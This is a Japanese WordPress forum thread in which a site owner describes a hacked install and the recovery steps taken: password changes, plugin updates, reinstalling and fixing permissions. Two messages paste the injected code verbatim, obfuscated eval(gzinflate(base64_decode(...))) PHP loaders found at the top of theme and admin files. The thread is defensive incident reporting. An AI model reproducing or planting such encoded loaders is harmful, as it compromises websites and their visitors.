aeiic

chestnut_jpさん、redcockerさん

サードパーティのサイトからダウンロードできるプラグインやテーマを使う場合は、WordPressのプラグインやテーマからダウンロードする以上にセキュリティ面で慎重になったほうがいい、できたら使わないほうがいいということでしょう。

気をつけるようにします。

今回は、本当にありがとうございました。

redcockerさん
chestnut_jpさん

e38.phpでも検索してみたんですけど。
これもありませんでした。

Denbunは、Web ArenaのWebメールで使われているようです。

chestnut_jpさん
お世話になります。

入れられていたコードは

<?php /*85a94d550af6dc824edff1886326b756*/ eval(gzinflate(base64_decode(‘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’)));?>

といったものです。

すみません。
単純なパスワードのミスでした。
本当に申し訳ないです。

WPtouchはちょっと古いバージョンを使っていました。
多分、３月くらいの時点で最新だったバージョンです。
Web ArenaのPHPが5.1.6のため、プラグインも最新バージョンにしてしまうと、Wordpress全体がストップしてしまうことも少なくなくなってきてしまい、バージョンアップに待ったをかけてしまっていました。

現時点では、WPtouchも最新版にしました。
WordPressのユーザーのIDとパスワードも変更しました。
ftpのパスワードも変更しました。

そこまでは良かったんですが。

SQL DBのパスワードを変更。
wp-config.php
に新しいSQL DBのパスワードを書き入れて、HPの方を上書きしたら、サイト全体が停止してしまいました。
真っ白状態になってしまいました。

WordPressを入れなおしたところ、iPhoneアプリのWordPressでも不正なデーターという表記が出なくなりました。
iPhoneアプリで不正なデーターと言い出した頃からおかしなコードを入れられていたのかもしれません。

chestnut_jpさん。
ありがとうございます。

> eval(gzinflate(base64_decode(

の記述がまさにあります。

ちょうど検索していて、
http://ja.forums.wordpress.org/topic/2619?replies=10
を読み始めたところです。

パーミッションの設定をし忘れていました。
これが原因で、phpを書き換えられているのではないかと思っています。

先週まで動いていたpluginをかたっぱしから外したところ、ダッシュボードを表示できるように放ったのですが。

表示が、10年前のHTMLの直打ちで作ったような感じになってしまっています。

最初は、themes.phpだけがおかしかったので、ftpでthemes.phpだけを、wordpress3.1.3の圧縮ファイルの中の物から上書きしました。

それで、一応うまくいっていたのですが。

今朝になると、今度は、管理画面全てが、HTMLの直打ちで作ったみたいな画面になってしまいました。

/wp-admin/index.phpを見てみると、
昨日のthemes.phpのように
phpのあたまに当初はなかった

<?php /*019bff1d2a9d0c5f794357e98abeb92f*/ eval(gzinflate(base64_decode(‘DdQ1rsUIAkTR5Uy3HJhJExmfmTkZmZnZq5+fl25UOuWVDv/UXztVQ3qU/2TpXhLY/4oyn4vyn//whSjypyszNs/gwKtXPOfNHRKPxba7iDMmGwWsLu2XacRP4LItyCJ3oGINJzbU

中略

oN4x62JNKRRwSjP1oHyl0/ec28lBmE4Idcyv4GuBI2hwaAQOn9zdHb5oVDYu0VjlVnnOlgf8yaYfXP6bRor28uNBPCN+if62Snhq4A1IgmEv+AGkzKjiymwDJwEouhwubpB18/Hj66JIMr0hnJs+j49xG3SXZFmBjxyv0wMUUlT6lyvnozRtR+iM/+DlpgcRWKLNXgnG7enxybQ0PuOSr7cVDtG3VTqnPLym9VgiBIfjQAViB4W//5999///t/’)));?>

こういったものが頭に入っているようです。